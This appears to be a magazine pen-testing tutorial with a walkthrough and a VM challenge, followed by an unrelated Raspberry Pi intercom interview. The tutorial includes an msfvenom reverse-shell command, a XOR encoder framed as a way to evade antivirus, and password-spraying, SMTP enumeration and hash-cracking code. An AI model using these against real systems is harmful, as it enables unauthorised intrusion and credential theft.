agree on the scope of the test; at which time of day the test will be conducted, what to do when a critical vulnerability is found, and so on. This is an important stage because it defines what you are authorised to do and provides you with some legal coverage.

Once that is settled, the pen-test begins with the information gathering stage, where the pen-tester makes use of open source intelligence (OSINT) techniques in order to gather as much information about the company, its systems, networks and employees as possible (email addresses, subdomains and so on). This first step is known as 'footprinting'. After that, the pen-tester engages with a bunch of preselected target systems and networks to collect banners, software versions and the like. This is known as 'fingerprinting'. Next, the pen-tester will sort out all the information obtained in order to perform threat modelling, where possible attack scenarios are considered. In order to determine which ones would succeed, the fourth stage deals with vulnerability assessment, where the pen-tester actively engages with the company systems and networks in order to look for well-known vulnerabilities that could be exploited. For those detected weak spots, the pen-tester will run exploits against the vulnerable services and systems during the exploitation stage. Being able to set a foothold into the system is good, but the pen-tester must go beyond that by moving laterally on the network, dealing with evasion techniques, escalating privileges and being persistent. This is known as the post-exploitation stage.

Finally, the boring stuff: reporting. This is the last stage and the one that summarises all the findings, vulnerabilities and actions performed against the target's systems. There are two types of report: an executive report and a technical report. The former is meant for executives and offers a high-level overview of the findings. The latter is meant for the security engineers working in the company and is heavily technical.

These stages are not mandatory: some pen-tests may stop right at the fourth stage because the company does not want the pen-tester to exploit the findings. During the exploitation stage, a pen-tester must be extremely careful: running exploits against live systems can break them. That is why it's so important to have a deep understanding of the exploits used against a target. So, it does not matter whether you want to become a professional pen-tester or you are just interested in learning about it to protect your own network: this tutorial will provide you with a bunch of tools and techniques, a real pen-testing engagement, plus a pen-testing challenge to test your skills. Happy hacking!
Information gathering

Welcome to information gathering, the most tedious (along with reporting) and yet the most important stage in any pen-testing engagement. During this stage, you will perform both passive and active discovery. The former leverages public sources to gather information without connecting to the target systems, and is also known as footprinting, whereas the latter implies some level of interaction and is known as fingerprinting. For most pen-testers (including you), this is where most of your time should be spent. Apart from Google Search or Bing, you can use a bunch of well-known tools to automate (to a certain degree) the extraction and sorting of this information [see Tutorials, p52, LU&D172]. Tools such as Recon-ng, Spiderfoot and Maltego ( can prove really useful. These tools leverage online services such as Censys, Shodan, GitHub, Twitter and so on (by means of their APIs), so it's best to have valid accounts there.

Above OSINT techniques allow you to perform passive discovery against targets (almost) without leaving a trace
Right Integrated tools
like Sparta are great for
performing fingerprinting
and vulnerability
assessment in one shot
Arm yourself to the teeth!

The first thing to do is to pick your tools (see GNU/Linux Pen-testing Distros box, p59) and be able to write your own. Pen-testing engagements are tightly related to sensitive data. A pen-tester may perform more than one assessment at any given time, so these assessments must be isolated from one another. The computer(s) used during an engagement must be properly protected as well. All the data must reside on an encrypted partition (in Kali Linux, this is easily accomplished during the distro's installation thanks to LUKS and LVM) so that, in case of a stolen computer, unauthorised users will not be able to access the information gathered or extracted during the pen-test.
Max intel
Make sure to gather as much information about your target as possible during the information gathering stage, then take as much time as needed sorting it all out.
A pen-tester using a VPN to perform the assessment
must make sure that uncontrolled packets are not going
out of their host network interface to avoid being noisy
on the audited network. If you are a bit paranoid, then set
up proper rules to allow output packets to reach target
hosts and services as you need them. Configuring some
rules for the IPTABLES OUTPUT chain is as important
as being able to set up proper rules for both the INPUT
and FORWARD chains too (see How To Self-Secure Your
Pen-testing Computer box p55). This is equally important
for servers; sadly, most system managers tend to forget to do this.
We are about to have some fun now. Before going
further, though, you will need to install Kali Linux on a
virtual machine on your computer. If you have already
picked another pen-testing GNU/Linux distro, that's fine: most of them include the same tools and frameworks, or you can install them on your preferred GNU/Linux distro.
Gathering the information is but the first step: later on,
you will have to sort it out. Among all the gathered data,
some low-hanging fruit may appear: legacy systems
[see Tutorials, p44, LU&D182], maybe an open SMTP
relay, some old CMS version still running on an obscure
directory within the company’s web server [see Tutorials,
p38, LU&D175]… who knows? Trust us: it’s boring stuff,
but it’s totally worth it.
Once you have a good understanding of the servers and
systems running on the target, you can model possible
attack vectors. Imagine that during passive discovery
using Shodan, a list of client desktops with public IP addresses running RDP has popped up. Unluckily for you, there are no screenshots this time. It could be a good idea to perform active discovery next in order to grab a screenshot of every host, thereby obtaining some usernames and Windows versions along the way.

The information gathering stage is the most tedious, boring and yet the most important one in any pen-testing engagement
Go and download EyeWitness: git clone https://, and then
execute it this way: -f hosts.txt --rdp
(where hosts.txt is the file with all the hosts reported by
Shodan, one per line). See? Now you could guess some
of these passwords. Some users may have very weak
ones. You then annotate these as a feasible attack vector
during the exploitation stage. Besides, having some Windows versions will help you perform the vulnerability assessment stage, too.
So far so good but, what if the information gathering
stage does not reveal low-hanging fruit? Well, that’s why
the pre-engagement stage is key: are you allowed to use
‘social engineering’ attacks? If so, you can perform an
assortment of attacks: spear-phishing, mass malware mailouts to the target's employees, and others. There's
a well-known tool that integrates most of these attacks
to save you time: SET ( Before
preparing the attack, of course, you will need to gather
a lot of information about a subset of employees. Social
networks like Twitter and Facebook are useful here. Some
incredible tools exist to automate this extraction, such as
Tinfoleaks. Navigate to its website and click
on ‘Search for leaks’. Type the Twitter account you want
to get information from in the ‘@Twitter username’ box
and a valid email account in the ‘Email Address’ box and
you will receive a detailed report in your inbox. If you don’t
want to use your own email address, you can generate a disposable address with a throwaway-email service.
If you are even more paranoid, use the Tor network to
hide your IP from Tinfoleaks. Leaks such as geolocation
information, tools used by the user, and so on will be
presented to you. You can also use Tinfoleaks from the
CLI if you prefer so ( – zip file).
Do you need more? Probably: use Maltego CE to gather a
comprehensive list of email addresses, accounts, websites
where the user has posted information, possible GPG
keys, and much more; everything rendered as nodes in a
fancy graph!
The information gathering stage is not limited to
computers or network equipment such as routers,
switches or even access points. Employees from around
the globe are nowadays bringing their devices (tablets,
smartphones and the like) to the office. This, of course,
increases the attack surface. During a pen-test, if you
happen to find smartphones connected to the network,
then the chances are that these devices are poorly
protected, so you should consider them as easy targets.
Do your homework
Found nothing during passive discovery? Oh well, time to prepare some social engineering attacks then! Before that, make sure to get as much information as possible about your targets.
Self-secure your pen-testing computer
Encrypt your data
During the installation of Kali Linux (and other pen-testing distros), you will be given the choice of setting up LVM and LUKS to encrypt your partitions. Don't hesitate to do it, and do not forget to encrypt the swap partition too. In case your computer is stolen, this will prevent unauthorised users from accessing any sensitive data extracted during a pen-test.
Stay away from PoCs
Whenever feasible, avoid downloading and executing
PoC (Proof of Concept) code against real targets because it
tends to be unstable and poorly written. Besides, it may harm
your computer as well. If you happen to find a service that may
be vulnerable to a well-known issue, stay within bullet-proof
frameworks such as Metasploit to execute exploits securely.
Put a leash on your output packets!
Use iptables to set up proper rules for the OUTPUT chain in order to prevent undesirable output packets going out of your network interface. First, drop everything: iptables -P OUTPUT DROP. Next, add the rules you need to the chain along the way; for example, for DNS resolution: iptables -A OUTPUT -o eth0 -p udp -d SERVER --dport 53 -j ACCEPT.

Verify and validate everything
Whenever setting up your pen-testing equipment, make sure to validate every single downloaded ISO image, DEB package, or even APT remote repository to avoid ending up installing a tampered piece of software! Besides, if you are using Kali you will be logged in as 'root', so be extremely cautious before executing unknown code or tools.
Begin with the basics
During the vulnerability assessment stage, start with the basics first: legacy systems, old software versions, open services that allow user enumeration, poor default and insecure configurations, other low-hanging fruit, and so on.
As a rule of thumb, spend as much time as possible performing passive discovery; you'll be surprised at how much company information is leaked on the internet.
Vulnerability assessment
Well, here you are: you have finished modelling threats
and now you are ready to start the vulnerability
assessment stage. Let’s imagine that you have found an
SMTP server within the target’s network, so a reasonable
attack vector could be to test whether this SMTP server is
an open relay or allows you to perform user-enumeration
by means of the RCPT TO or VRFY commands. In case
it does, you could proceed to enumerate valid email accounts (thus revealing email addresses in addition to the ones obtained during the footprinting step by, for example, running TheHarvester). Then, you could
prepare a brute-force password attack in order to gain unauthorised access to some email accounts (often, the portion of the email address before the domain is also the username). Of course, if you do get access to one such account, the chances are that you will be able to access other services as that user, because most companies provide their users with some sort of single sign-on (CAS) server. Kali ships with a bunch of tools for SMTP user enumeration; let's try smtp-user-enum first:
# smtp-user-enum -M VRFY -U users.txt -t SERVER
SERVER: www exists
Kali includes another tool, ismtp. Let’s try it: ismtp
-h SERVER -e users.txt -l 1. Suppose this time,
however, you get an error, e.g. ‘Error 2.0.0. www’, and
the tool stops. Why? Some tools will work out of the box whereas others won't; this is fairly common when it
comes to security tools and scripts – so get used to it.
You should be able to fix these issues by making some
code changes; whenever in a hurry, though, just choose
another tool or write your own.
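If you do decide to write your own, a minimal sketch might look like the following. The helper names are ours; smtplib's VRFY support is part of the Python standard library. Only run it against servers you are authorised to test:

```python
import smtplib

# SMTP reply codes that suggest VRFY matched a mailbox; 252 means the
# server cannot verify but will try to deliver, a weaker signal.
POSITIVE_CODES = {250, 251, 252}

def vrfy_user_exists(code):
    """Interpret an SMTP VRFY reply code as 'user probably exists'."""
    return code in POSITIVE_CODES

def enumerate_users(host, users, port=25, timeout=10):
    """Issue VRFY for every candidate username against one SMTP server."""
    found = []
    with smtplib.SMTP(host, port, timeout=timeout) as smtp:
        for user in users:
            code, _message = smtp.verify(user)
            if vrfy_user_exists(code):
                found.append(user)
    return found

# Example (authorised targets only):
# enumerate_users("SERVER", ["www", "root", "postmaster"])
```

Separating the reply-code check from the network loop also makes the logic easy to reuse when a tool breaks and you need a quick replacement.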
Now that you have some valid user names, get some
huge password lists from and use
them in your brute-force password attacks. Good tools to
perform brute-force attacks are Hydra and Patator (both included in Kali). These are great utilities for attacking well-known services such as SMTP, SSH and FTP. As a pen-tester, it won't always be that easy, though. You must be
prepared to code your own brute-force scripts for custom
or in-house developments. We suggest you use Python
because it is very easy to write something that works in
no time. The same goes for user-enumeration. A common
approach would undoubtedly be to guess a user’s
password by means of trying the same username each
time with a different password; however, sometimes it’s
better to do the opposite: use the same password each
time with a list of different usernames. Many users will
share the same password, although they don’t know it!
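This 'one password, many usernames' approach (often called password spraying) is easy to sketch in Python. Here try_login is a hypothetical callback you would implement for the service under test:

```python
def spray(usernames, passwords, try_login):
    """Try each password against every user; return authenticated pairs."""
    hits = []
    for password in passwords:      # outer loop: one password at a time
        for user in usernames:      # inner loop: each user gets one try
            if try_login(user, password):
                hits.append((user, password))
    return hits

# Dummy back-end for demonstration only:
ACCOUNTS = {"alice": "Winter2017", "bob": "Winter2017", "carol": "s3cret"}
demo = spray(list(ACCOUNTS), ["Winter2017", "123456"],
             lambda u, p: ACCOUNTS.get(u) == p)
# demo -> [('alice', 'Winter2017'), ('bob', 'Winter2017')]
```

Cycling through all users before moving on to the next password also helps you stay under per-account lockout thresholds.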
Keep looking for services vulnerable to user
enumeration. Content management systems (CMSes)
and learning management systems (LMSes) are good
candidates. If you happen to locate a web server on
the target’s network that is running some sort of CMS,
then try to get a list of its users. Wpscan is a good tool
A real pen-testing engagement
Information Gathering
We are provided with the
company’s network address. We use
Censys ( to have a quick
look at those servers accessible from
the internet first. We are working from
outside the company’s network, operating
as a Black Hat with no foothold into the
network. Censys shows us a bunch of
hosts, one of them running a web server
tagged as ‘HeartBleed’.
Threat Modelling
During the Threat Modelling stage,
we consider the following vector attack:
exploiting the HeartBleed bug to pilfer
some sensitive data out of the web server.
This way, we may be able to grab some
credentials or authentication cookies.
We have not yet tested for the vulnerability;
we are just considering different attack
vectors, and this is the first one that comes
to mind because of its simplicity.
Vulnerability Assessment
During the VA stage, we run
some tests using OpenVAS and Nessus in
order to determine if the hosts reported
by Censys and their services have wellknown vulnerabilities. We do know that
one web server, apparently, is vulnerable
to HeartBleed, but we want to make sure
there are no more issues. We confirm the
HeartBleed bug using Metasploit. This web
server is also running OpenSSH.
for enumerating WordPress users. Focus your efforts
on enumerating installed plug-ins as well (they tend to
be buggy).
During the Vulnerability Assessment stage, you
could run a vulnerability scanner such as OpenVAS
(, Nessus (
or Nexpose ( But they are too
noisy and only as good as their knowledge base. When
dealing with huge infrastructures or whenever running
on a tight schedule, they are a good option to consider, though: the most obvious vulnerabilities will probably be detected. However, if you have collected a good
Some security tools
will work out-of-the-box
whereas others won’t
deal of services, banners and software versions, you
can skip these scanners (almost) entirely. Use ‘Vulners
vulnerability database’ instead!
So, let's imagine you have found a Secure Shell server on the target network thanks to nmap: 'banner: SSH-2.0-OpenSSH_4.3p1 Debian-9etch3'. You now know this is a GNU/Linux computer running Debian Etch with OpenSSH server 4.3p1. Navigate to Vulners and look for potential OpenSSH vulnerabilities; type bulletinFamily:exploit AND OpenSSH into the search box and press Enter.

Exploitation
The fun stuff comes during the Exploitation stage. We execute the Metasploit module 'auxiliary/scanner/ssl/openssl_heartbleed' in 'DUMP' mode in a loop in order to extract some data from the server. We gather lots of information and a few hours later we proceed to filter it out. Using grep and some regular expressions, we bump into our first credential! Now we can try to move laterally on the network.

Among all the results, you will see
a Denial Of Service (DoS) vulnerability. If you follow the
link (, you will
get additional resources and information such as: which
vulnerability scanners detect it (e.g., here we see that
both Nessus and OpenVAS detect this vulnerability), a
public exploit hosted on ExploitDB, and references to
reported security bulletins by some GNU/Linux distros.
Vulners is really useful because you do not need
to run a security scanner against your target with all
the noise and issues that this could entail; instead,
you can grab banners and versions during the active
discovery step and later on look for well-known
vulnerabilities and public exploits there. You can add
Vulners lookups in your own scripts thanks to its API
Post-exploitation
Next, we establish an SSH
connection to the web server using our
first credential. We do not have superuser
privileges yet, but we find out that this
server is running a kernel vulnerable
to Dirty COW. So we exploit this bug,
overwriting a setuid root file (/usr/bin/X)
with a reverse root shell connecting back to
our computer; from here we create a new
user with sudo privileges.
Above There's no need
to be noisy; Vulners
database is a great tool
to look up well-known
vulnerabilities and
it’s free to use!
Reporting
We conclude the engagement by
writing a couple of reports; the executive
one will give a high-level overview of this
finding (along with any others), whereas
the technical one should describe all
the steps performed in order to set a
foothold into the system. We include
ways of patching the vulnerabilities
detected along with a list of good
practices and recommendations.
Pen-testing is
not an exact
science; so get
used to going
back and forth
on its different
stages. Make
heavy use of
lateral thinking
and try things
that have worked
for you in the
past first.
Right Remember the
notorious website
PleaseRobMe? Well,
Tinfoleaks can help
you track down a
particular user during the
information gathering
stage, too
as well. One tool that leverages Vulners API is getsploit:
git clone
Use it to download public exploits for, say, Samba 2.2:
./getsploit -m samba 2.2. Another interesting project
is Vulners-scanner (;
if you get access to a target computer, execute this
host scanner locally in order to enumerate possible
vulnerabilities: ./
Exploitation stage
Now is when the fun really begins: you have spotted a
bunch of services that are apparently vulnerable. Vulners
has reported to you that there is a public exploit. You
then proceed to download this exploit in order to execute
it against the target, hoping that the vulnerability will
be successfully exploited. Wrong! Long before executing
any exploit against a target, you need to read it and
understand what it really does [see Tutorials, p38,
LU&D174]. Install the very same service as the target on
a virtual machine in your lab, whenever feasible, and try
the exploit there first. Look for exploits in the Metasploit
Framework ( in the first place.
If there is no public exploit, read all the security bulletins
carefully in order to understand the issue and try to code
your own PoC; test it against your VM first.
It’s not always about well-known vulnerabilities,
though. Sometimes the flaws may reside within
an in-house development. This is fairly common
on websites. For such cases, learn about the ten
common vulnerabilities affecting web applications
( Web hacking has
become a big trend as it's easier to exploit poorly thought
out web applications than trying to exploit the web
server itself. Let’s imagine you have found a web server
running on the target’s network. According to its banner,
it's an Apache Server 2.2.16 running PHP. You look for well-known vulnerabilities and find a promising one. But maybe this won't work, as PHP isn't configured to work as CGI on the web server. Time to analyse the web application, then.

Post-exploitation and network attacks
Among all the tools and techniques available to any pen-tester, some network attacks are routinely performed once they have control of a target during the post-exploitation stage. You can deploy ARP (Address Resolution Protocol) poisoning attacks in order to intercept and even manipulate traffic from and to hosts; this sort of attack is usually combined with DNS spoofing and is also known as man-in-the-middle (MITM). Use Ettercap to automate and perform this sort of attack. Traffic capture is also common: you can use a tool such as Xplico to capture the application data contained within traffic (such as images, emails using POP or IMAP protocols, VoIP calls and so on).
You are dealing with an in-house development you
don’t know anything about, so you can proceed by
testing the Top 10 common issues of web applications.
Nikto is a good open source web scanner (included in
Kali). Focus on user-input fields: maybe there’s an SQL
injection flaw there? Anyway, you will need to be fluent
in creating scripts and payloads; Metasploit will not
always have what you need out-of-the-box. Let’s imagine
that you have found a web application that allows you to
upload a file whose extension is either JPG, PNG or GIF.
This application runs on a Windows server. You first try
Kali Linux
This distro is Debian-based and a rolling release, which means you get updates every day. It's meant to be installed on a regular computer for performing pen-testing engagements and/or forensics.
to upload a PE binary and fail; time to use a web proxy
(Burp Suite or ZAP!, both included in Kali). Using a proxy,
you can intercept any POST or GET request before it is
actually sent to the web server, but right after all the
client-code has been executed. This way you can alter
any parameter and analyse the server’s behaviour by
means of processing its responses. This is a well-known
trick to bypass most of the controls set in place in
client-code. In addition, Burp Suite allows you to actively
engage with the server in order to detect potential SQL
injections among other vulnerabilities from the Top 10.
Don’t do that unless you are on a really tight schedule:
you cannot know beforehand what could happen to the
web application – or the web server, for that matter.
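The underlying lesson deserves a sketch: any check that runs in the browser can be sidestepped by a proxy that rewrites the request afterwards, so the server must validate again. The function names here are ours:

```python
ALLOWED = (".jpg", ".png", ".gif")

def client_side_check(filename):
    """What the JavaScript running in the browser might enforce."""
    return filename.lower().endswith(ALLOWED)

def server_side_check(filename):
    """The server must repeat the validation; it cannot trust the client."""
    return filename.lower().endswith(ALLOWED)

# The user picks a harmless name, so the browser check passes...
assert client_side_check("holiday.jpg")
# ...but an intercepting proxy rewrites the POST body after that check:
tampered = "shell.exe"
# Only a server-side re-check catches the tampered filename:
assert not server_side_check(tampered)
```

A real application also needs to validate file contents, not just the name, but the principle is the same: never trust what the client claims to have checked.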
When you are uploading binary files to a target, the
chances are that some antivirus can detect your binary
as malicious. Try it: create a new reverse_tcp shell for Windows 32-bit using msfvenom: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<your-IP> -f exe -o Meterpreter.exe. Now upload this file to VirusTotal

It's all in the detail
Tools are great, but don't rely solely on them; you need to understand the nuts and bolts of the issues you are facing, otherwise you will be no different from any guy running a vulnerability scanner.

Web hacking has become a big trend as it's easier to exploit poorly thought out web applications than the server itself
Parrot Security
Like Kali Linux, Parrot has a host of utilities
designed for pen testing. But it also has utilities
for computer forensics, reverse engineering,
hacking, privacy, anonymity and cryptography.
BackBox
An Ubuntu-based distro, it can be used as a regular pen-testing distro (such as Kali). Unlike Parrot, though, you have to purchase its maker's services if you want to deploy it in the cloud.
( As of this writing, 50 out of 64
antiviruses have detected it as malicious. Get used to always encoding your payloads to bypass antivirus. You can use strong encryption if you want, but most of the time a 'NULL-preserving single-byte XOR encoding' will do. You can write a trivial Python script that XORs every byte in Meterpreter.exe with a secret key (get it from the cover disc). Then execute it. Now upload the resulting file, Meterpreter.xored,
to VirusTotal. See? Of course, once uploaded to the
vulnerable server, don’t forget to decode it back!
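The encoding itself fits in a few lines. This is our own sketch of a NULL-preserving single-byte XOR, not the cover-disc script: bytes equal to 0x00 or to the key are left untouched, so no NULL is created or destroyed, and the transform is its own inverse:

```python
KEY = 0x41  # hypothetical single-byte secret key

def xor_encode(data, key=KEY):
    """NULL-preserving single-byte XOR; decoding uses the same function."""
    out = bytearray()
    for b in data:
        if b == 0 or b == key:
            out.append(b)       # preserve NULLs and the key byte itself
        else:
            out.append(b ^ key)
    return bytes(out)

payload = b"MZ\x00\x00fake binary payload"
encoded = xor_encode(payload)
assert b"\x00\x00" in encoded            # NULLs survive the encoding
assert xor_encode(encoded) == payload    # applying XOR twice round-trips
```

To encode a real payload, feed it the file contents: xor_encode(open("Meterpreter.exe", "rb").read()).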
During some of your engagements you may be able to
download a whole database with some usernames and
hashed passwords. That’s when the huge password lists
downloaded early on will come in handy! Try to paste
some hash into Google. Still no luck? Crack it! If you
don’t recognise a particular hash, use hash-identifier or
hashid first:
[+] Cisco-IOS(SHA-256)
[+] Cisco Type 4
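If you want a feel for how tools like hashid make their guesses, length and character set get you a long way. This toy identifier (our own, with a candidate table far smaller than the real tools use) does just that:

```python
import re

# Candidate hash types per hex-digest length (real tools check many more).
CANDIDATES = {
    32: ["MD5", "NTLM"],
    40: ["SHA-1"],
    64: ["SHA-256"],
    128: ["SHA-512"],
}

def identify_hash(digest):
    """Guess possible hash types from a bare hex digest."""
    if not re.fullmatch(r"[0-9a-fA-F]+", digest):
        return []   # not a plain hex digest (could be salted or encoded)
    return CANDIDATES.get(len(digest), [])

print(identify_hash("5f4dcc3b5aa765d61d8327deb882cf99"))  # a 32-char digest
```

Ambiguity is normal: a 32-character hex string could be MD5 or NTLM, which is why these tools return lists of candidates rather than a single answer.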
Next, you can use hashcat (with GPU support to speed up
Stay in the loop
Keep an eye on reported data breaches and get your hands on any leaked password lists published on the internet; you could use them later on during your dictionary attacks.
the process) in order to crack them. You should begin with
a dictionary attack using all the passwords you already
have. You will be shocked by just how easy it is to crack a bunch of hashes using a dictionary and some simple hashcat rules.
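To see why rules matter, here is a toy cracker (ours, not hashcat) that mangles each dictionary word with two simple rules, capitalise and append a digit, before hashing:

```python
import hashlib

def candidates(word):
    """Yield the word plus simple hashcat-style mangled variants."""
    for base in (word, word.capitalize()):
        yield base
        for digit in "0123456789":
            yield base + digit

def crack_md5(digests, wordlist):
    """Return {digest: plaintext} for every stolen MD5 hash we can match."""
    cracked = {}
    for word in wordlist:
        for guess in candidates(word):
            h = hashlib.md5(guess.encode()).hexdigest()
            if h in digests:
                cracked[h] = guess
    return cracked

# "Password1" is never in the wordlist, yet two rules recover it:
stolen = {hashlib.md5(b"Password1").hexdigest()}
print(crack_md5(stolen, ["password", "letmein"]))
```

Each rule multiplies the dictionary's reach for almost no extra cost, which is exactly why rule files ship with hashcat.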
Put your skills to the test!
It’s time to get your hands dirty. We have set up a
Pen-testing Challenge for you. You will need to import
the VirtualBox appliance Linux User and Developer
Pentesting Exercise.ova from the cover disc (or download
it from FileSilo). Open VirtualBox and choose File > Import
Appliance. Choose the OVA file from the cover disc and
click the ‘Next’ button. Don’t make any changes to the
Appliance Settings window and just hit the ‘Import’
button. Wait until the appliance is imported. This VM uses
a host-only interface named vboxnet0. If you do not have
this virtual interface up, use VirtualBox to do so; go to
File > Preferences > Network > Host Only Networks and
make sure to create a new virtual device; the first one
should be named vboxnet0. Click the ‘OK’ button. Next,
go to the VM settings page, select the Network option
and check that the Cable Connected checkbox is enabled
on the Adapter 1 tab. Power on the VM and wait until it
has booted up completely. You will see a console login.
This VM will get its TCP/IP settings from the VirtualBox
DHCP server; it should get an IP address automatically.
Use Wireshark or tcpdump while the VM is booting up to
capture the DHCP packets and see the actual IP address
assigned, in case you need it.
You are free to use whatever tool or technique that we
have described throughout this feature or others; but you
are not supposed to know anything beforehand about
this computer and you're not supposed to have physical
access to it. Of course, you can see a lot of information
scrolling down the VM screen; let’s pretend you can’t.
That said, are you up for the challenge?
The pen-testing challenge
You have been hired as a pen-tester to assess the
security of one particular server. You have been provided
with the following details:
• You are meant to take a black-box approach.
• You cannot engage with other systems/computers
running on the company’s network.
• You cannot perform social engineering attacks.
• They want you to assess the security of this computer
and determine if it is feasible to gain a root shell.
Get trained
Learning about pen-testing is awesome, but doing
so by engaging with real systems is illegal (unless, of
course, you own them) – and even then, you risk breaking them.
That’s why there’s a bunch of GNU/Linux distros
and software especially designed to be vulnerable:
Metasploitable3 (
is meant for testing Metasploit and Web Security
Dojo ( has been designed to
test your web pen-testing skills. Navigate to in order to learn about
some particular vulnerabilities and ways of
exploiting them (some of these exercises are free
and include an ISO that you can download).
SickOs 1.1 ( is another distro
that’s worth a look and some write-ups are starting
to appear here:
• You are provided with the IP address of the server to assess.
Tips & tricks
There may be different ways to solve this pen-testing
challenge. If you get stuck, there’s a possible step-by-step
solution on the cover disc (Feature_Pentesting_Exercise_tcg.pdf)
and FileSilo. What follows is a guide
that can help you with the challenge:
1. Information Gathering: Start by jumping to the
fingerprinting step (no need to gather intel using OSINT
techniques for this challenge). Tools: nmap.
2. Threat Modelling: Focus your attention on feasible
attack vectors, the simpler the better. Tip: isn’t an in-house
development a common source of vulnerabilities?
3. Vulnerability Assessment: Look up well-known
vulnerabilities for detected software versions. Tools:
Vulners, OpenVAS, Nessus.
4. Exploiting: Try the simplest vulnerabilities first. Tip:
try bypassing some client control checks on in-house
developments. Learn to adapt your attack to the current
engagement: not every pen-test is alike. Be creative.
Tools: Burp Suite or ZAP Proxy and some UNIX tools: cat,
dd, nc…
5. Post-exploitation: Escalate privileges by exploiting
well-known vulnerabilities – old setuid binaries or some
kernel bug. Tools: public exploit written in C plus some
reverse shell created with msfvenom.
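nmap is the tool for step 1, but to see what its most basic scan (a TCP connect scan) does under the hood, here is a minimal sketch in Python — the function name and defaults are ours, and this is no substitute for nmap on a real engagement:

```python
import socket

def scan_ports(host, ports, timeout=0.5):
    """Return the subset of `ports` that accept a TCP connection on `host`."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the connect succeeded
                open_ports.append(port)
    return open_ports

# Example: scan_ports("192.0.2.10", [22, 80, 443])
```

A connect scan is noisy (it completes the full TCP handshake); nmap’s SYN scan and service-version probes are far stealthier and more informative.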
As an additional challenge, once you have been able to
gain a root shell on the target computer, you could code
your own exploit. This exploit could be adapted, later on,
to work as a module for Metasploit (see
BuildModule). Try harder and… happy hacking!
Raspberry Pi
“A wall-mounted
Google Voice
Assistant housed in
a 1986 intercom”
Create a chat bot
in Minecraft
Encode your secrets
using musical notes
Detect things that go
bump in the night
Measure the Earth’s
shape with PyGeodesy
Google Pi Intercom
The launch of the Google AIY Kit enabled the creation of an
intercom that answers questions and follows commands
projects using the Alexa technology and a couple of other
projects, [including] a talking rabbit, I did with Alexa. I
just really like it. There’s something about it and it’s really
interesting to see how the kids interact with it as well as
they have much more open minds than we have about
the ways things are done. They ask it things that I would
never think of asking, so it’s interesting.
Works as an analyst
in Intelligence and
Analytics at Norfolk
County Council
and has a passion
for combining new
technology with
vintage design.
Like it?
If you want to
experience Pi
inspired cuteness,
you’ll want to take
a look at Martin’s
talking rabbit
project at http:// As
well as answering
queries via Alexa,
this creature can
be commanded
to do many things
including start a
laser show, play
music and even take
selfies and upload
them to Twitter – all
while waggling its
cute little ears.
For the blow-by-blow
account of
Martin’s adventure
building this retro
Google Assistant
intercom, head to
its Instructables page.
When Martin Mander heard that a Google AIY (Artificial
Intelligence Yourself) Voice Kit was going to be free with
an issue of The MagPi, the Raspberry Pi Foundation’s
official magazine, it prompted a lunchtime dash to the
newsagents to snag one for his next project. It wasn’t
long before he hit on the idea of a wall-mounted Google
Voice Assistant housed in a 1986 intercom. The AIY Voice
Kit uses the power of Google Natural Language combined
with a Voice HAT and other components – although
you’ll need to buy a Raspberry Pi 3 – to create a DIY
Google Home device. Since this project was completed,
the popularity of the AIY kit has meant it’s gone into
full manufacture and you can now pre-order kits from
Pi Hut ( and Pimoroni
( in the UK for £25 and
from Micro Center (
in the USA for $25. The Foundation says that the new
kits are even easier to assemble and easier to code for
because of an improved API.
What projects interest you?
What I mostly do is retro conversions. We go to the car
boot sales at the weekend and we’re always on the
lookout for anything unique or that has a really good look
to it, no matter what it is; it could be any kind of thing
really – TVs, radios and that sort of thing. But it has to be
something that I really like and then that gets stored and
usually later on I think about what to do with it. That’s
what I’m passionate about: using new technology to bring
life back to obsolete electronics.
You seem to like the voice control side of things. Is this
something you’ve been doing for a while?
Yes, I think the year that Amazon released their code for
the Raspberry Pi []. I was keen to get into
that straight away. I did the Alexa phone project just over
a year ago. I think that was one of the first published
What do you think of the Voice HAT?
As a kit I thought it was really good. I would class myself
as intermediate to advanced, [but] if it was somebody
just picking it off the shelf, they could take it home and
make it. All they need is a Pi, they don’t need a soldering
iron, they didn’t need anything fancy to put it together.
That’s what surprised me – I thought there was going to
be at least some soldering but no, it clipped together. The
quality of the components seemed good and what I’m
starting to think about now is soldering in some of those
headers and getting some GPIO control on there – the
more advanced person is happy to do a bit of soldering. I
think they pitched the kit just right because if you want to
do more fancy stuff you can, but equally, in its own right,
you can just have a weekend and do a project and have
fun without being a specialist.
Are there any compromises that you made? Would you
approach the project differently now you’ve finished?
[Laughs] Yeah, I made one mistake which was putting it
together and I had to reflash it just before I assembled it
and when I reflashed it I didn’t re-enable SSH. It’s in the
case now, but I can’t get at it without taking it apart.
I think, in retrospect, I would have had a closer look at
the code. There was someone from Google who sent me
an email saying ‘did you see that you can do this, this and
this? Edit this one script.’ Oh no, I wish I’d had a look at
those scripts and maybe changed the voice to GB voice
instead of the American one. Changed the localisation,
because it reads out temperatures in Fahrenheit at the
moment. There are a few lines in the script that you can
change for that and also the wake word activation. So you
can say “Intercom, when’s my next?” whatever and you’d
be able to do that.
Have you got any other projects in mind after this one?
I really want to build a robot. I’ve never built a robot, when
I did the talking rabbit it had little servos that moved its
ears when it got a notification through and that was really
interesting, but to make something that trundles around
the house and does something purposeful with voice
control in it. That’s the main idea, but I want to find the
right case for it. My boss has an old K-9 up in his loft –
the K-9 has been done, but a robot is definitely next.
Components list
• Raspberry Pi 3
• Mid-1980s FM intercom
• 2.3-inch Visaton FR58 8-ohm full-range speaker
• Voice HAT accessory
• Voice HAT microphone
• Switch from arcade-style push button
• 4-wire button cable
• 5-wire daughter board
Snug speaker
The speaker from
the AIY Voice Kit is
3 inches and wasn’t
going to fit in the
intercom case, so
Martin needed to
find an alternative
that was as sturdy
and as good quality
– that turned out to
be a 2.3-inch Visaton
FR58 8-ohm full-range speaker.
Tight mic
The microphone in the AIY Voice Kit sits on its own board and
turned out to be a “natural fit” for the top of the intercom
case. By placing it here, Martin was able to put the Raspberry
Pi 3 at the grille end, although he wasn’t able to expose the
HDMI port with the Pi in that position.
Switch to talk
To keep that retro feel, Martin
retained the original travel of the
intercom’s ‘talk’ button. He did this
by making sure the switch from the
kit was held in the right place by a
retaining screw that also fixed the
hinged button in place. In a stroke
of good fortune, he was able to
use an existing screw-hole for this
important job.
Google juice
In Martin’s video (,
he and his 10-year-old daughter demonstrate
how they used the AIY Voice Kit to set up their
Google Assistant that you can activate with a
click of a ‘talk’ button. The intercom has also
